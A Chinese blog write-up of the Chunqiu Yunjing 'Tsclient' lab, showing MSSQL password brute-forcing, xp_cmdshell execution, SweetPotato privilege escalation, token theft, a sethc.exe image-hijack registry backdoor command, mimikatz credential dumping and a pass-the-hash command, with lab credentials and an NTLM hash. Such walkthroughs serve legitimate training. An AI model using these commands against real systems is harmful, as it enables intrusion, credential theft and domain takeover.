【内网渗透】春秋云镜 Tsclient WP

最新推荐文章于 2024-06-16 12:23:02 发布
最新推荐文章于 2024-06-16 12:23:02 发布
阅读量1k 收藏 2
点赞数 1
文章标签: windows linux 内网渗透 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sapphire037/article/details/130685734
版权

前言

mssql连接和攻击、windows提权、令牌窃取、镜像劫持

flag1

上来就扫给的地址
nmap:
在这里插入图片描述
结合题目的mssql知识点,估计是从这里入手了,尝试爆破用户名和密码,这里先用fscan来爆,可以直接爆出来(别的工具也可)
在这里插入图片描述
得到

sa 1qaz!QAZ

用这个工具去进行后面的攻击

https://github.com/SafeGroceryStore/MDUT/releases/tag/v2.1.1

在这里插入图片描述
激活组件下的Xpcmdshell即可命令执行
尝试访问Users/Administrator下的文件无回显,新建文件报错,目前我们没有权限读取,那么先配代理,不配代理远程桌面都连不上。chisel:
在这里插入图片描述
跳板机这边是windows,所以要下windows的chisel.exe,跳板机上执行的命令就多个.exe,其他一样。
配好以后打开本机proxifier配置代理服务,不再赘述。
上传甜土豆,地址如下

https://github.com/uknowsec/SweetPotato

(刚打的时候我也疑惑,为什么就知道要上传甜土豆,然后大哥们说都是经验…
不过甜土豆确实可以针对大部分的windows去提权)
直接利用
在这里插入图片描述
-a 后面加命令 这里我添加一个用户为sapphire,命令自查,然后给最高权限
在这里插入图片描述
登陆找到flag1
在这里插入图片描述
在这里插入图片描述

flag2

给了提示Maybe you should focus on user sessions
注意会话状态
quser命令 # 查看当前服务器用户连接状态
在这里插入图片描述
发现有个john在连接这台机子,所以这台主机是存在John的令牌的,尝试进行令牌窃取,这里我参考别人的文章用的ShrakToken,会报错,安装这个就行
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
安装结束以后就可以用了,用上面提到的数据库连接软件上传SharkToken.exe进来,然后使用管理员权限打开cmd,用sharktoken进行令牌窃取
在这里插入图片描述
窃取以后 net use查看有个网络共享的文件夹在这里插入图片描述
在这里插入图片描述
读取文件
在这里插入图片描述
得到一个用户名和密码,并且提示镜像劫持。

xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#登陆

做好信息收集,fscan扫C段

NetInfo:
[*]172.22.8.46
   [->]WIN2016
   [->]172.22.8.46
NetInfo:
[*]172.22.8.18
   [->]WIN-WEB
   [->]172.22.8.18
   [->]2001:0:348b:fb58:2096:324f:d89b:c8fb
[*] 172.22.8.31          XIAORANG\WIN19-CLIENT      
NetInfo:
[*]172.22.8.15
   [->]DC01
   [->]172.22.8.15
NetInfo:
[*]172.22.8.31
   [->]WIN19-CLIENT
   [->]172.22.8.31
[*] 172.22.8.15    [+]DC XIAORANG\DC01              
[*] WebTitle:http://172.22.8.18        code:200 len:703    title:IIS Windows Server.
[*] 172.22.8.46          XIAORANG\WIN2016           Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.8.46        code:200 len:703    title:IIS Windows Server

本机是172.22.8.18
先看看本机情况
在这里插入图片描述
因为主DNS后缀为空,所以这个机子不在域内
那么还有三个机子

172.22.8.31 WIN19-CLIENT
172.22.8.15 [+]DC XIAORANG\DC01 域控
172.22.8.46 XIAORANG\WIN2016           Windows Server 2016 Datacenter

用crackmapexec进行一个枚举登陆,其实也不用,就这几台机子试一下就行了

proxychains  crackmapexec  smb 172.22.8.0/24 -u Aldrich -p 'Ald@rLMWuy7Z!#' --loggedon-users

用rdesktop登陆,用户名Aldrich,密码Ald@rLMWuy7Z!#

proxychains rdesktop 172.22.8.46(试了以后只有这个可以)

登陆以后提示要改密码,那就改,改完以后用windows自带的远程桌面登陆,不然kali的太卡了
在这里插入图片描述
提示了镜像劫持,网上搜文章试试

Get-Acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *

在这里插入图片描述
普通用户也可以创建,这里参考别人的

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

然后锁定屏幕,按5次shift即可,我这添加了个新管理员,其实直接将刚才登陆的用户设置成管理员就可以了,因为新添加的用户不在域内.
在这里插入图片描述
得到flag2

flag3

在这里插入图片描述
查看域管用户
在这里插入图片描述
接着上传mimikatz到172.22.8.46里,抓取hash,怎么上传文件百度就有
管理员权限运行cmd,提权,抓密码

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit

在这里插入图片描述
刚好这里有域管的NTLM
使用mimikatz进行hash传递攻击

.\mimikatz.exe
sekurlsa:pth /user:目标机器用户名 /domain:目标机器IP /ntlm:本地获取的NTLM hash值
例如:sekurlsa::pth /user:administrator /domain:192.168.3.133 /ntlm:afff........

那么就是

sekurlsa::pth /user:WIN2016$ /domain:g1ts /ntlm:e64a6ccc013938f2c6daaa63480727c5

然后就会弹出一个cmd.exe可以直接访问到域控的文件,拿到flag3
在这里插入图片描述

Sapphire037
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
tsclient:寒意打字稿客户端
04-14
tsclient 安装 yarn add @getchill.app/tsclient 用法 import { Credentials , rpcService , RPCService , certPath , RPCError } from '@getchill.app/tsclient' export const creds : Credentials = new Credentials ( certPath ( 'Chill' ) ) export const rpc : RPCService = rpcService ( 'localhost:49405' , creds ) // Authenticate with service const auth = await rpc . authUnlock ( { secret : 'mypassword' , type :
Terminal Server Client [tsclient]:项目已被https://sourceforge.net/projects/remmina/取代-开源
05-14
终端服务器客户端[tsclient]是rdesktop和其他远程桌面工具的GTK2前端。 该项目已被Remmina取代-https://sourceforge.net/projects/remmina/
wsdl-tsclient:从wsdl生成打字稿客户端
04-03
WSDL TSClient 示例如何生成和使用: 从WSDL文件生成带有打字稿定义的。 该库正在使用生成打字稿代码和以供运行时使用。 受Java 和启发。 注意:将添加到您的npm运行时依赖项( npm i soap ) 安装 npm i wsdl-tsclient 或与-g一起安装以使CLI全局可用。 npm i -g wsdl-tsclient 用法 您可以检查示例存储库 使用CLI生成客户端 wsdl-tsclient ./soap.wsdl -o ./generated wsdl-tsclient ./resources/**/*.wsdl -o ./generated使用glob Version: 1.0.1 Syntax: wsdl-tsclient [options] [path] Example: wsdl-tsclient file.wsdl -o ./
Ichunqiu云境 —— Tsclient Writeup
WUfagg的博客
12-12 748
MSSQL,Privilege Escalation,Kerberos,域渗透,RDP
My Software List
lifision的专栏
03-03 146
[align=center][img]http://www.techairlines.com/wp-content/uploads/2009/10/ubuntulogo.png[/img][/align] /usr/share/applications |-- ./LibFetion.desktop |-- ./MySQLAdministrator.desktop |-- ./MySQLQ...
春秋云镜靶场挑战——Tsclient
Cobra的博客
03-25 2504
目标IP:39.98.73.212 网络拓扑 入口机器 1、使用namp对目标IP进行扫描,发现目标开放了1433端口(MSSQL服务),3389端口(RDP服务) 2、可以先爆破MSSQL服务,如下可以看出成爆破出密码 3、使用MDUT工具连接Mssql 4、使用xp_cmdshell执行命令发现只有一个比较地低的权限 5、使用CS生成木马,利用MDUT上传木马 6、执行木马上线CS C:/Users/Public/beacon.exe 7、使用土豆提
【渗透测试】Tsclient-春秋云镜 极致的工具化打法!
m0_74272345的博客
10-03 495
这个靶场是纯Windows靶场,有很多难点,也有很多可扩展学习的地方。fscan爆出MSSQL弱口令,通过MDUT工具拿下WIN-WEBRDP贯穿整个内网渗透的思路,是这个靶场的核心john用户用tsclient挂载C盘到WIN-WEB,把域内主机用户密码给泄露了,可以做密码喷洒攻击(密码碰撞)映像劫持提权:放大镜这个是直接拿WP的用,可以扩展学习impacket工具包的使用作为一个学习渗透从B站红队笔记开始的人,春秋云镜的靶场很多的使用工具让人有点略微不适应。
春秋云境Tsclient-WP【一遍过】
weixin_63576152的博客
10-05 244
quser查看计算机上的用户会话信息(quser命令在windows server和windows的某些专业版才适用)上传mimikatz,用shift后门启动管理员权限的cmd,运行mimikatz,执行命令。服务器管理器-->管理-->添加角色1 和功能-->功能-->勾选.net3.5进行安装。里面有一个敏感文件,查看后获取一个凭证和一个提示(镜像劫持)运行完会跳出一个命令框,直接通过命令行可以访问域控的文件。查看权限,当前用户是普通用户,没有管理员权限。或者用下面的命令添加用户test,远程登录。
春秋云镜 ----Tsclient(kking)
m0_60742333的博客
11-02 514
工具:Multiple.Database.Utilization.Tools-2.1.1-jar-with-dependencies.jar。在 cmd窗口中输入查找flag 03 (若提示密码不正确则返回上一步查看hash值是否传递正确)通过复制粘贴的形式将mimikatz从本地上传到远程,并以管理员身份运行。kali里太卡了,转用SocksCap64-4.7配代理远程连接。密码过期了,使用kali直接连接远程桌面修改密码。获取后进行hash传递。发现mssql弱口令漏洞,使用工具连接。
春秋云镜-Tsclient-Writeup
qq_35607078的博客
07-12 2702
春秋云镜-Tsclient-Writeup
TPM:TSClient LEGACY软件包管理器(TPM)-TSClient LEGACY ThinClient操作系统的软件包管理器。 它完全用OCaml编写,并使用GNU Tar,GNU Gzip和来自GNU Coreutils或类似程序的工具
02-03
TPM:TSClient LEGACY软件包管理器(TPM)-TSClient LEGACY ThinClient操作系统的软件包管理器。 它完全用OCaml编写,并使用GNU Tar,GNU Gzip和来自GNU Coreutils或类似程序的工具
TPM2:TSClient LEGACY软件包管理器(TPM)的版本2-TSClient LEGACY ThinClient操作系统的软件包管理器的第二版本完全用C ++编写。 它使用GNU Tar,zlib,TinyXML2和SQLite作为软件包数据库
02-04
TPM2:TSClient LEGACY软件包管理器(TPM)的版本2-TSClient LEGACY ThinClient操作系统的软件包管理器的第二版本完全用C ++编写。 它使用GNU Tar,zlib,TinyXML2和SQLite作为软件包数据库
春秋云境—Initial
龙狼刺的博客
07-15 1789
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。在DCSync技术没有出现之前,攻击者要想拿到域内用户的hash,就只能在域控制器上运行 Mimikatz 或 Invoke-Mimikatz去抓取密码hash,但是在2015 年 8 月份, Mimkatz新增了一个主要功能叫"DCSync",使用这项技术可以有效地 “模拟” 域控制器并从目标域控上请求域内用户密码hash。
路径中出现tsclient
Z_W_H_的博客
05-07 361
原因是该文件是通过远程进行访问的,不是本机电脑的文件。
春秋云镜wp day1
xy404的博客
10-13 3586
今天看到之前买了内网渗透那本书,今天看到靶场上线了,打一天玩一下,总体cve的洞很好刷,比打CTF轻松多了。
靶场练习--春秋云境-Tsclient
NoooEmotion的博客
01-28 2135
Tsclient是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。
春秋云镜-【仿真场景】Tsclient writeup
渗透测试研究中心
03-07 443
0x1 InfoTag:MSSQL,Privilege Escalation,Kerberos,域渗透,RDP靶场地址:https://yunjing.ichunqiu.com/ranking/summary?id=BzMFNFpvUDU0x2 ReconTarget external ip47.92.82.196nmapMSSQL 弱口令爆破,爆破出有效凭据,权限为服务账户权限(MSSQLSE...
春秋云境】CVE-2022-23134靶场WP和CVE-2022-22965靶场WP
果粒程
12-05 989
春秋云境】CVE-2022-23134靶场WP和CVE-2022-22965靶场WP
Java中的Stream API及其应用
最新发布
Programming Talk
06-16 247
Stream是元素的序列,这些元素支持顺序和并行的聚合操作。Stream不存储数据,它们只是对数据的一个视图。Stream操作可以分为两类:中间操作和终端操作。中间操作:返回Stream自身,允许链式调用,如filtermap等。终端操作:触发Stream计算,并返回结果,如collectforEach等。@Override本文介绍了Java中的Stream API及其实际应用场景。通过Stream API,我们可以以函数式编程风格简洁、清晰地处理集合数据。
\\TSCLIENT\D\ZP20.XLS,是什么意思
03-20
很抱歉,根据你提供的信息,我无法准确回答你关于"\\TSCLIENT\D\ZP20.XLS"的问题。"\\TSCLIENT\D\ZP20.XLS"看起来像是一个文件路径,但我无法确定具体是什么文件或者它的含义。如果你能提供更多的背景信息或者问题的上下文,我将尽力帮助你解答。以下是一些可能有助于你的问题: 1. "TSCLIENT"是什么意思? 2. "D"代表什么? 3. "ZP20.XLS"是什么类型的文件? 4. 你需要关于该文件的哪方面的信息? 请提供更多详细信息,以便我能够更好地回答你的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值